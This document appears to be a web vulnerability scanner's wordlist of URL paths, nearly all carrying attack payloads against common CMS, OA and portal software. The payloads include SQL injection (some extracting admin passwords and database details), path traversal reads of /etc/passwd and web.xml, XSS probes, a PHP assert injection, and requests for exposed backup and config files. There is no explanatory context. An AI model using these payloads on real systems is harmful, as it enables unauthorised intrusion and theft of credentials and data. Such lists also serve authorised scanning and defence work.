/burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/cache/bak_mysql.txt
/cacti.sql
/cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
/caigou/NoticeList.aspx?Type=%27%2b+(select+convert(int%2cCHAR(106)%2bCHAR(105)%2bCHAR(120))+FROM+syscolumns)+%2b%27
/capturedownload.php?action=1&picpath=config.ini
/card.php/login.php/login.php/login.php/login.php?cardNumber=-1%27%20UNION%20SELECT%201,md5(0x045154),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
/card_search.php/login.php/login.php/login.php?cardNumber=-1'%20UNION%20SELECT%201,md5(0x045154),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
/card_sold_print.php/login.php/login.php/login.php?ID=9999999999'%20UNION%20SELECT%201,md5(0x045154),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%23
/cart.aspx?act=buy&bindingid=1%20and%201=char(106)--
/cart.aspx?act=spikebuy&spikeid=3%20and%201=char(106)%2bchar(120)%20--
/cartstep1.aspx?act=area&id=@@version
/case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
/category/xwxc/p/p/p/p/p/p/p/$%7B@assert(exit(md5(0x41545)))%7D/p/p/1.html
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%204391%20from(select%20count(*),concat(0x7e,(mid((ifnull(cast(md5(0x4515)%20as%20char),0x20)),1,50)),0x7e,floor(rand(0)*2))x%20from%20information_schema.character_sets%20group%20by%20x)a)%20and%20'1'='1
/cctrl/admin/purview/purview.php
/cctrl/backup/index.php
/celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/celive/js/include.php?departmentid=webscan'&cmseasylive=1
/centreon/include/views/graphs/graphStatus/displayServiceStatus.php?session_id='%20or%201=1%20--%20/**&template_id='%20UNION%20ALL%20SELECT%201,2,3,4,5,CHAR(59,%2032,%2099,97,116,32,47,101,116,99,47,112,97,115,115,119,100,%2059),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20--%20/**%20
/cfg/user.cfg.ini
/cgi-bin/
/cgi-bin/admin/configfile.cgi
/cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
/channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjwtlist.aspx?t=(select+convert(int%2c@@version))
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
/client/checkuser.aspx?user=test'%20and%20char(106)%3E0--&pwd=1
/cms/ad/column_tree_xml_admin.jsp?_web_id=1'%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7179647371,0x6141534f415555665645,0x717a687371),NULL,NULL,NULL,NULL,NULL%23
/cms/cms/infopub/gjjs.jsp?pubtype=S&pubpath=dkt&startdate=&enddate=&topic=&content=&authorname=&origin=&description=&webappcode=A02&searchdir=A02&templetid=-21'%20union%20all%20select%20char(106)%2bchar(62)%2bchar(60),null,null%20--
/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/common/tree_json_data.jsp?type=JSON_DATA_GROUPDEPTUSER&id=1'%20UNION%20ALL%20SELECT%20CHR(113)%7C%7CCHR(108)%7C%7CCHR(97)%7C%7CCHR(104)%7C%7CCHR(113)%7C%7CCHR(118)%7C%7CCHR(108)%7C%7CCHR(66)%7C%7CCHR(80)%7C%7CCHR(112)%7C%7CCHR(106)%7C%7CCHR(85)%7C%7CCHR(111)%7C%7CCHR(97)%7C%7CCHR(71)%7C%7CCHR(113)%7C%7CCHR(108)%7C%7CCHR(110)%7C%7CCHR(112)%7C%7CCHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/conf/system.xml
/cms/framework/dbfile/createdbfile.jsp
/cms/infopub/rss.jsp?channelcode=-A%27%20union%20all%20select%20char%28106%29%2bchar%28106%29%2Cnull%2Cnull%2Cnull%20--&maxnum=20
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/cms/web/dimensionpic.jsp?action=copy&SrcPicPath=/WEB-INF/web.xml&PicPath=/cms/web/reer.txt
/cms/web/jspdownload.jsp?FileUrl=%5Cetc%5Cpasswd
/cms/web/jspdownload.jsp?FileUrl=c:%5Cwindows%5Cwin.ini
/cms/web/testsql.jsp
/cms/webapp/critic/p_criticfrontlist.jsp?TID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,0x6F6B6A3A6F6B6A,NULL,NULL%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/columninfo.jsp?ColumnID=-5%20UNION%20SELECT%201,2,md5(1122),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%23
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/comments.php?id=3a&tablepre=boka_members+where+1%3d1+and+(select+1+from+(select+count(*)%2cconcat((select+concat(0x3a%2cmd5(1122)%2c0x3a)+from+boka_members+where+uid%3d1)%2cfloor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/common.asp?id=19+and+1=2+union+select+1,admin,password%2b'%7C360webscan',4,5,6+from+admin_user
/common.inc
/common/activeX/activeX.php?meetingId=11&userId=11/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/common/codewidget.jsp?code=1'%20AND%201=char(106)%20--
/common/edu/call.php?meetingId=11/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/common/edu/index.php?isGet=1&deal=contact&userId=11/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
/common/mail.php/xxx'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='?a=VGsxTlpXVjBhVzVuVTJOb1pXUjFiR1U9&c=a&g=a
/common/monitor/index.php?userId=111/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/common/web_meeting/ajax.php?module=ajaxGetGroupUserByGroupId&gId=1,(select/**/1/**/from/**/(select/**/count(*),concat(0x5E7C5E,md5(0x7765627363616e),0x5E7C5E,database(),0x7c,version(),0x5E7C5E,FLOOR(RAND(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/common/web_meeting/downMeetingRecord.php?name=../../../etc/passwd
/company/SearchProducts.aspx?id=115&keyname=ppp%25'%20and/**/1=char(106)/**/%20--%20
/company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
/compare.php?goods[]=1111&goods[]=1112&goods[]=1113%22%3E%3Cscript%3Ealert(360)%3C/script%3E
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/conf/
/conferences/currentconf.php?deptname=-1'%20and%201=2%20UNION%20SELECT%201,concat(0x7c,md5(1122),0x7c),3,4,5,6,7,8%23
/conferences/journal.php?confid=-1%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7%23
/conferences/logoconf.php?confid=-1%20UNION%20SELECT%201,concat(0x7c,md5(1122),0x7c),3,4,5,6,7,8%20%23
/config.inc.php.bak
/config/
/config/cn/config.php?iDeviceID=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x3A0040003A00,IFNULL(CAST(md5(0x7765627363616e)%20AS%20CHAR),0x20),0x3A0040003A00),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
/config/cn/config.php?iDeviceID=-1%20UNION%20SELECT%201%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/config/cn/tree.php?iSub=1&id=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%23
/config/config_global.php.bak
/config/config_ucenter.php.bak
/config/dbconfig.ini
/configright.php?nodeId=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15
/configright_decoder.php?nodeId=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12
/conformID.asp?Tid=jx'%20and%201=char(106)%20--
/conformID.asp?Tname=web'%20/**/and/**/1=char(106)--
/conn.inc
/connect.inc
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/connect.php?receive=yes&mod=login&op=callback&referer=webscan%bf%5Cu0027.replace(/.%2b/,/javascript:alert(42873)/.source);//
/console/
/console/login/LoginForm.jsp
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/corporation.php?rewrite=rewrite&Catid=db_mymps-my_corp%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
/counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
/crossdomain.xml
/ctop/person/common/get_file.jsp?file_path=//WEB-INF/web.xml
/ctop/person/common/get_file.jsp?file_path=/DocumentShow.jsp
/customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
/cycle_image.php?language=999%20union%20select%201,2,3,(select%20md5(1122)%20from%20nitc_user%20limit%200,1),5,file,7,8,9,0,1%20from%20nitc_ad%23%5Een
/data.mdb
/data/
/data/%23data.asp
/data/%23data.mdb
/data/admin.mdb
/data/article.mdb
/data/common.inc.php.bak
/data/mysql_error_trace.inc
/database.inc
/database/
/databases/4dsdo0/%254&764/%23fgf&0O.mdb
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/datas/
/db.inc
/db/
/dealfunc/comment_js.php?cmid=1%20order%20by%2030--webscan_draGxn
/deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
/decodermanage.php?NodeID=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x3A0040003A00,IFNULL(CAST(md5(0x7765627363616e)%20AS%20CHAR),0x20),0x3A0040003A00),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20
/decodermanage.php?NodeID=-11%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%23
/dede/
/defaultroot/boardroom/iWebOfficeSign_sql/DocumentEdit.jsp?RecordID=-2074%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C%28SELECT%20CONCAT%280x717765727479%2C0x3A746573743A%2C0x7168726371%29%20FROM%20ezoffice.org_employee%20LIMIT%2021%2C1%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23&Template=0&FileType=.doc&EditType=1&UserName=1&moduleType=1&saveHtmlImage=1&saveDocFile=1
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/demo.php?time=alert(String.fromCharCode(52,%2050,%2056,%2055,%2051))
/deptProceedingDetailnew.do?itemtype=12%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)&depNO=jx&approveName=&nowPage=3
/deptProceedingDetailnew.do?itemtype=6&depNO=1122'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122&approveName=&nowPage=3
/design/tabledesign/tabledelete.jsp?TableName=1'%20AND%20(SELECT%206237%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,0x6F6B6A3A6F6B6A,0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'cPnC'='cPnC
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/developer_tools/webresource_list_left_page.aspx
/devicemanage.php?NodeID=-1%20UNION%20SELECT%201%2C2%2Cconcat%28md5%280x4515421%29%2C0x7c%2Cdatabase%28%29%2C0x7c%2Cuser%28%29%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15
/devicemanage.php?NodeID=-1+or+1=1+and+(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*),CONCAT(md5(0x7765627363616e),0x3a,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)
/dianping/claim.php?fid=1&_erp=%60A+LEFT+JOIN+%60qb_dianping_content%60+B+ON+A.id=B.id+procedure+analyse(extractvalue(rand(),concat(0x3a,md5(0x7765627363616e))),1)--+-%23
/djnotice/qydjnotice.jsp?cx=1&entname=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(89)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(57)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'rOd'='rOd
/do/api/uc.php?code=0bafU3yf6F7GsKqf3iZb1mSEZGreWpWlgHPE7DZRfkxE%2BOKOacQgl4JLy%2FS389F7qVCajFQ0xuDo1y6UUvt3NoR85dpBZd%2BdSNT7PaI
/do/api/uc.php?code=3313Q1ueQOU%2B1vFFJiosRu1wjJh0TPNrnivmg700mcfy4aJR3QChRsLmasXzCBnypE%2BZ8Oj9hPTpwoVCmRCIcG4lFbZfMhTlmKdb7Sc
/do/count.php?fid=1'%3E%22)%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(120,%20115,%20115))%3C/script%3E
/do/fujsarticle.php?type=like&FileName=../data/8137572f3849aabdwebscan.php&submit=check
/do/kindeditor.php?id=%bf%22;alert(1);//&style=&etype=
/docs/Lists.aspx?PinYin=1'%20AND%20CHAR(106)%2bCHAR(58)%3E0%20--
/domcfg.nsf
/domlog.nsf
/down.asp?cat_%69d=3%20and%201=2%20union%20select%201,'ijx',3,4,5,6,7,8,9,10,11,12,13%20from%20admin
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/down/class/index.php?myord=0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(sha1(0x3336307765627363616e),(SELECT%20(CASE%20WHEN%20(8274=8274)%20THEN%201%20ELSE%200%20END)),FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/downLoadFile.action?filePath=/WEB-INF/web.xml
/download.action?filename=../../../../../../etc/passwd
/download.php?tfile=%5C..%5C..%5Cconfig.php
/e/data/ecmseditor/infoeditor/epage/TranFile.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranFlash.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranImg.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/e/data/ecmseditor/infoeditor/epage/TranMedia.php?InstanceName=3232%22%3E%3Cscript%3Ealert(/D/)%3C/script%3E%3C%22
/eassso/WEB-INF/web.xml
/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql
/edoas2/edoas2_test.jsp
/eln3_asp/public/cscec8b/bulletin.jsp?type=info&type_id=3&id=-120'%20OR%20(SELECT%204774%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'BLkR'='BLkR&type_id=3&re=0
/emlib4/format/release/aspx/eml_userwh.aspx
/engine/websigncontrol/readsigndata.jsp?id='%20union%20select%20concat(char(98,121),0x7c,char(99,102,114,101,101,114))%23
/enterprise/index.php/admin/index
/epaper/admin/advresult.jsp?searchKeys=%27%20and%20extractvalue(1,concat(0x5c,md5(0x41411)))%23
/epaper/admin/showlist.jsp?papername=1%27%20and%20extractvalue(1,concat(0x5c,md5(0x41411))))a%23
/epaper/admin/showresult.jsp?searchKeys=1'%20and%20extractvalue(1,concat(0x5c,md5(0x41411)))%23
/epaper/createcd/createcd.jsp?dowhat=createcd&papername=1%27%20and%20extractvalue(1,concat(0x5c,md5(0x41411)))%23
/epp/LoginServerDo.jsp?userid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd&pwd=1
/epp/core/eppquickdesk/eppmsg/eppmsg.jsp?pk_infotype=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(87)%7C%7CCHR(98)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(79)%7C%7CCHR(97)%7C%7CCHR(67)%7C%7CCHR(75)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/epp/core/eppquickdesk/eppnotice/notice.jsp?pk_infotype=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(109)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(97)%7C%7CCHR(97)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'ohehe'='ohehe
/epp/core/public/singleplandetail.jsp?pk=1012'%20AND%201234=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(122)%7C%7CCHR(99)%7C%7CCHR(113)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(3640=3640)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(102)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'eye'='eye
/epp/detail/publishinfodetail.jsp?pk_message=-1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(117)%7C%7CCHR(117)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(98)%7C%7CCHR(98)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'ohe'='ohe
/epp/html/nodes/upload/SupdocDo.jsp?areaname=1'%20AND%209387=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(113)%7C%7CCHR(58)%7C%7CCHR(108)%7C%7CCHR(121)%7C%7CCHR(113)%7C%7C(SELECT%20(CASE%20WHEN%20(9387=9387)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(113)%7C%7CCHR(99)%7C%7CCHR(58)%7C%7CCHR(121)%7C%7CCHR(113)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'msxd'='msxd&supdocname=1&pk_singleplan=1
